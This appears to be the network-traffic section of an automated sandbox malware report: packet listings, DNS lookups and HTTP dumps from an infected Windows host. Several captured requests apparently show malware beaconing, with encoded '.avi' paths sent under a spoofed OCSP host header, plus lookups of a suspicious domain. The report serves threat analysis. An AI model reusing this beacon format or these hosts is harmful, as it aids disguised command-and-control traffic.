                                        Sep 10, 2021 11:33:46.355886936 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355890036 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355937004 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355941057 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355945110 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355958939 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.356021881 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.356028080 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.356031895 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.356564045 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.369194984 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.369389057 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.369405985 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.369477987 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.372294903 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.372406960 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.372570992 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:51.780335903 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:51.780462980 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:33:51.984167099 CEST44349763104.20.184.68192.168.2.5
                                        Sep 10, 2021 11:33:51.984282017 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:34:16.583816051 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.583959103 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.610209942 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.610240936 CEST804986013.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.610363007 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.610460997 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.615251064 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.624521017 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.624609947 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.628947973 CEST804986013.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.629134893 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:16.642028093 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.704760075 CEST804985913.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:16.706470013 CEST4985980192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.471602917 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.472501040 CEST4986480192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.498066902 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.498327971 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.498629093 CEST804986413.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.498737097 CEST4986480192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.499046087 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.508624077 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.508781910 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:19.525216103 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.584824085 CEST804986313.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:19.584886074 CEST4986380192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.696990013 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.705615044 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.723470926 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.723577976 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.724298000 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.733434916 CEST804990813.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.733541965 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.748198032 CEST804990813.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.748272896 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.751080036 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.753705025 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:43.758853912 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.813817978 CEST804990713.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:43.813904047 CEST4990780192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:46.637494087 CEST804986013.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:46.638531923 CEST4986080192.168.2.513.225.29.132
                                        Sep 10, 2021 11:34:49.526247025 CEST804986413.225.29.132192.168.2.5
                                        Sep 10, 2021 11:34:49.532546043 CEST4986480192.168.2.513.225.29.132
                                        Sep 10, 2021 11:35:13.761585951 CEST804990813.225.29.132192.168.2.5
                                        Sep 10, 2021 11:35:13.761696100 CEST4990880192.168.2.513.225.29.132
                                        Sep 10, 2021 11:35:15.557018995 CEST4994780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:15.557276964 CEST4994880192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:16.557615042 CEST4994780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:16.557625055 CEST4994880192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:18.557907104 CEST4994880192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:18.557907104 CEST4994780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:21.380172968 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:35:21.380201101 CEST49819443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:35:21.387341976 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:35:21.387363911 CEST49763443192.168.2.5104.20.184.68
                                        Sep 10, 2021 11:35:22.570374012 CEST4995380192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:22.571439981 CEST4995480192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:23.566916943 CEST4995380192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:23.582540035 CEST4995480192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:25.573657036 CEST4995380192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:25.589265108 CEST4995480192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:29.591558933 CEST4995780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:30.597425938 CEST4995780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:32.598104000 CEST4995780192.168.2.5185.186.142.136
                                        Sep 10, 2021 11:35:36.606376886 CEST4995880192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:37.621220112 CEST4995880192.168.2.595.181.198.158
                                        Sep 10, 2021 11:35:39.620636940 CEST4995880192.168.2.595.181.198.158

                                        UDP Packets

                                        Sep 10, 2021 11:34:43.664731026 CEST5667553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:43.695419073 CEST53566758.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:44.497044086 CEST5689553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:44.526281118 CEST53568958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:48.511920929 CEST5689553192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:48.546895981 CEST53568958.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:48.889614105 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:48.915317059 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:49.902688026 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:49.928850889 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:50.923252106 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:50.949836016 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:52.919790983 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:52.947000980 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:34:56.947187901 CEST5717253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:34:56.973226070 CEST53571728.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:15.510564089 CEST5526753192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:15.549719095 CEST53552678.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:17.039506912 CEST5096953192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:17.081967115 CEST53509698.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:19.965210915 CEST6436253192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:20.002125025 CEST53643628.8.8.8192.168.2.5
                                        Sep 10, 2021 11:35:43.641175985 CEST5476653192.168.2.58.8.8.8
                                        Sep 10, 2021 11:35:43.676727057 CEST53547668.8.8.8192.168.2.5

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Sep 10, 2021 11:33:32.696270943 CEST | 192.168.2.5 | 8.8.8.8 | 0xa44 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:36.086319923 CEST | 192.168.2.5 | 8.8.8.8 | 0xe127 | Standard query (0) | web.vortex.data.msn.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:36.695192099 CEST | 192.168.2.5 | 8.8.8.8 | 0x3680 | Standard query (0) | geolocation.onetrust.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:36.758147955 CEST | 192.168.2.5 | 8.8.8.8 | 0xd023 | Standard query (0) | contextual.media.net | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:39.525027037 CEST | 192.168.2.5 | 8.8.8.8 | 0xb102 | Standard query (0) | lg3.media.net | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:40.234529972 CEST | 192.168.2.5 | 8.8.8.8 | 0xee12 | Standard query (0) | hblg.media.net | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:41.667709112 CEST | 192.168.2.5 | 8.8.8.8 | 0xc5a9 | Standard query (0) | cvision.media.net | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:45.004209042 CEST | 192.168.2.5 | 8.8.8.8 | 0xdc30 | Standard query (0) | srtb.msn.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:46.175139904 CEST | 192.168.2.5 | 8.8.8.8 | 0xb92f | Standard query (0) | s.yimg.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:16.528331995 CEST | 192.168.2.5 | 8.8.8.8 | 0xdcd5 | Standard query (0) | ocsp.sca1b.amazontrust.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:19.421375036 CEST | 192.168.2.5 | 8.8.8.8 | 0x5ea4 | Standard query (0) | ocsp.sca1b.amazontrust.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:43.664731026 CEST | 192.168.2.5 | 8.8.8.8 | 0x68bb | Standard query (0) | ocsp.sca1b.amazontrust.com | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:35:15.510564089 CEST | 192.168.2.5 | 8.8.8.8 | 0x1fb0 | Standard query (0) | gstatistics.co | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:35:43.641175985 CEST | 192.168.2.5 | 8.8.8.8 | 0x2bf9 | Standard query (0) | gstatistics.co | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Sep 10, 2021 11:33:32.725291014 CEST | 8.8.8.8 | 192.168.2.5 | 0xa44 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
                                        Sep 10, 2021 11:33:36.136873960 CEST | 8.8.8.8 | 192.168.2.5 | 0xe127 | No error (0) | web.vortex.data.msn.com | web.vortex.data.microsoft.com |  | CNAME (Canonical name) | IN (0x0001)
                                        Sep 10, 2021 11:33:36.734420061 CEST | 8.8.8.8 | 192.168.2.5 | 0x3680 | No error (0) | geolocation.onetrust.com |  | 104.20.184.68 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:36.734420061 CEST | 8.8.8.8 | 192.168.2.5 | 0x3680 | No error (0) | geolocation.onetrust.com |  | 104.20.185.68 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:36.796466112 CEST | 8.8.8.8 | 192.168.2.5 | 0xd023 | No error (0) | contextual.media.net |  | 23.211.6.95 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:39.570903063 CEST | 8.8.8.8 | 192.168.2.5 | 0xb102 | No error (0) | lg3.media.net |  | 23.211.6.95 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:40.270116091 CEST | 8.8.8.8 | 192.168.2.5 | 0xee12 | No error (0) | hblg.media.net |  | 23.211.6.95 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:41.702008009 CEST | 8.8.8.8 | 192.168.2.5 | 0xc5a9 | No error (0) | cvision.media.net | cvision.media.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
                                        Sep 10, 2021 11:33:45.029160976 CEST | 8.8.8.8 | 192.168.2.5 | 0xdc30 | No error (0) | srtb.msn.com | www.msn.com |  | CNAME (Canonical name) | IN (0x0001)
                                        Sep 10, 2021 11:33:45.029160976 CEST | 8.8.8.8 | 192.168.2.5 | 0xdc30 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net |  | CNAME (Canonical name) | IN (0x0001)
                                        Sep 10, 2021 11:33:46.203030109 CEST | 8.8.8.8 | 192.168.2.5 | 0xb92f | No error (0) | s.yimg.com | edge.gycpi.b.yahoodns.net |  | CNAME (Canonical name) | IN (0x0001)
                                        Sep 10, 2021 11:33:46.203030109 CEST | 8.8.8.8 | 192.168.2.5 | 0xb92f | No error (0) | edge.gycpi.b.yahoodns.net |  | 87.248.118.22 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:33:46.203030109 CEST | 8.8.8.8 | 192.168.2.5 | 0xb92f | No error (0) | edge.gycpi.b.yahoodns.net |  | 87.248.118.23 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST | 8.8.8.8 | 192.168.2.5 | 0xdcd5 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.132 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST | 8.8.8.8 | 192.168.2.5 | 0xdcd5 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.199 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST | 8.8.8.8 | 192.168.2.5 | 0xdcd5 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.191 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST | 8.8.8.8 | 192.168.2.5 | 0xdcd5 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.204 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ea4 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.132 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ea4 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.199 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ea4 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.191 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST | 8.8.8.8 | 192.168.2.5 | 0x5ea4 | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.204 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST | 8.8.8.8 | 192.168.2.5 | 0x68bb | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.132 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST | 8.8.8.8 | 192.168.2.5 | 0x68bb | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.199 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST | 8.8.8.8 | 192.168.2.5 | 0x68bb | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.191 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST | 8.8.8.8 | 192.168.2.5 | 0x68bb | No error (0) | ocsp.sca1b.amazontrust.com |  | 13.225.29.204 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:35:15.549719095 CEST | 8.8.8.8 | 192.168.2.5 | 0x1fb0 | No error (0) | gstatistics.co |  | 185.186.142.136 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:35:15.549719095 CEST | 8.8.8.8 | 192.168.2.5 | 0x1fb0 | No error (0) | gstatistics.co |  | 95.181.198.158 | A (IP address) | IN (0x0001)
                                        Sep 10, 2021 11:35:43.676727057 CEST | 8.8.8.8 | 192.168.2.5 | 0x2bf9 | Server failure (2) | gstatistics.co | none | none | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • https:
                                          • geolocation.onetrust.com
                                          • s.yimg.com
                                        • ocsp.sca1b.amazontrust.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.5 | 49764 | 104.20.184.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Timestamp | kBytes transferred | Direction | Data


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.5 | 49820 | 87.248.118.22 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Timestamp | kBytes transferred | Direction | Data


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.5 | 49859 | 13.225.29.132 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Sep 10, 2021 11:34:16.615251064 CEST | 5257 | OUT | GET /images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avi HTTP/1.1
                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: ocsp.sca1b.amazontrust.com
                                        Connection: Keep-Alive
                                        Sep 10, 2021 11:34:16.704760075 CEST | 5258 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/ocsp-response
                                        Content-Length: 5
                                        Connection: keep-alive
                                        Accept-Ranges: bytes
                                        Cache-Control: public, max-age=300
                                        Date: Fri, 10 Sep 2021 09:34:16 GMT
                                        ETag: "5f457bf7-5"
                                        Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                        Server: nginx
                                        X-Cache: Miss from cloudfront
                                        Via: 1.1 19fefe7d41cfedb99873c7b5cd95d411.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: CDG3-C2
                                        X-Amz-Cf-Id: M-AVApgN7Rkkcakg6nE3Nv191fRyl2z84hxWoQa7t177Bd0qw-f4xA==
                                        Data Raw: 30 03 0a 01 06
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        3 | 192.168.2.5 | 49863 | 13.225.29.132 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Sep 10, 2021 11:34:19.499046087 CEST | 5260 | OUT | GET /images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avi HTTP/1.1
                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: ocsp.sca1b.amazontrust.com
                                        Connection: Keep-Alive
                                        Sep 10, 2021 11:34:19.584824085 CEST | 5261 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/ocsp-response
                                        Content-Length: 5
                                        Connection: keep-alive
                                        Accept-Ranges: bytes
                                        Cache-Control: public, max-age=300
                                        Date: Fri, 10 Sep 2021 09:34:19 GMT
                                        ETag: "5f457bf7-5"
                                        Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                        Server: nginx
                                        X-Cache: Miss from cloudfront
                                        Via: 1.1 2114f6e9c6130b946922a303f84256b1.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: CDG3-C2
                                        X-Amz-Cf-Id: tDWkQ5VaW6mmrKey-_nhcm8ul9DXL3MsBdVucq2JGp99X83JAJ70vg==
                                        Data Raw: 30 03 0a 01 06
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        4 | 192.168.2.5 | 49907 | 13.225.29.132 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Sep 10, 2021 11:34:43.724298000 CEST | 8736 | OUT | GET /images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avi HTTP/1.1
                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: ocsp.sca1b.amazontrust.com
                                        Connection: Keep-Alive
                                        Sep 10, 2021 11:34:43.813817978 CEST | 8737 | IN | HTTP/1.1 200 OK
                                        Content-Type: application/ocsp-response
                                        Content-Length: 5
                                        Connection: keep-alive
                                        Accept-Ranges: bytes
                                        Cache-Control: public, max-age=300
                                        Date: Fri, 10 Sep 2021 09:34:43 GMT
                                        ETag: "5f457bf7-5"
                                        Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                        Server: nginx
                                        X-Cache: Miss from cloudfront
                                        Via: 1.1 8513b0b4c77c9a98d13a007d589042ff.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: CDG3-C2
                                        X-Amz-Cf-Id: z_2pXzoy7ZS0VGBTG-mGcX3sT0nCP35aKr_YKxPqwR30sLgMBdt69A==
                                        Data Raw: 30 03 0a 01 06
                                        Data Ascii: 0


                                        HTTPS Proxied Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.5 | 49764 | 104.20.184.68 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-10 09:33:36 UTC | 0 | OUT | GET /cookieconsentpub/v1/geo/location HTTP/1.1
                                        Accept: application/javascript, */*;q=0.8
                                        Referer: https://www.msn.com/de-ch/?ocid=iehp
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: geolocation.onetrust.com
                                        Connection: Keep-Alive
                                        2021-09-10 09:33:36 UTC | 0 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 10 Sep 2021 09:33:36 GMT
                                        Content-Type: text/javascript
                                        Content-Length: 182
                                        Connection: close
                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Server: cloudflare
                                        CF-RAY: 68c7a7e13b42dfd7-FRA
                                        2021-09-10 09:33:36 UTC | 0 | IN | Data Ascii: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.5 | 49820 | 87.248.118.22 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2021-09-10 09:33:46 UTC | 0 | OUT | GET /lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg HTTP/1.1
                                        Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                        Referer: https://www.msn.com/de-ch/?ocid=iehp
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: s.yimg.com
                                        Connection: Keep-Alive
                                        2021-09-10 09:33:46 UTC | 1 | IN | HTTP/1.1 200 OK
                                        Content-Length: 195845
                                        Access-Control-Allow-Headers: X-Requested-With
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=2592000
                                        Content-Type: image/jpeg
                                        Edge-Cache-Tag: 343450606465613470501122455183989970294,415930648339712111872285657998251086336,ae7a14591aaf8d474cdb3f92111c923e
                                        Etag: "441833de41dfe8d94ac6f8ce4e751eba"
                                        Last-Modified: Fri, 18 Jun 2021 09:15:35 GMT
                                        Server: ATS
                                        Timing-Allow-Origin: *
                                        Accept-Ranges: bytes
                                        Date: Tue, 07 Sep 2021 10:42:04 GMT
                                        X-Served-By: cache-wdc5536-WDC
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1631011325.879705,VS0,VE1
                                        Age: 255102
                                        Strict-Transport-Security: max-age=15552000
                                        Referrer-Policy: no-referrer-when-downgrade
                                        X-Frame-Options: SAMEORIGIN
                                        cld_cache: HIT
                                        cld_hits: 1
                                        cld_by: cache-wdc5536-WDC
                                        cld_latency: 1
                                        Connection: close
                                        Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                        X-XSS-Protection: 1; mode=block
                                        X-Content-Type-Options: nosniff
                                        Data Ascii: 8{L|Ne*h|Q563Y72cdGu]Xi6TsCa#\z a@$)mLj^7!8K2}bFc~_Te2gsBo6oD,&_s:0Kn[8J1SuzT?GB\J*Y`@d2DdE:dUv6LV8
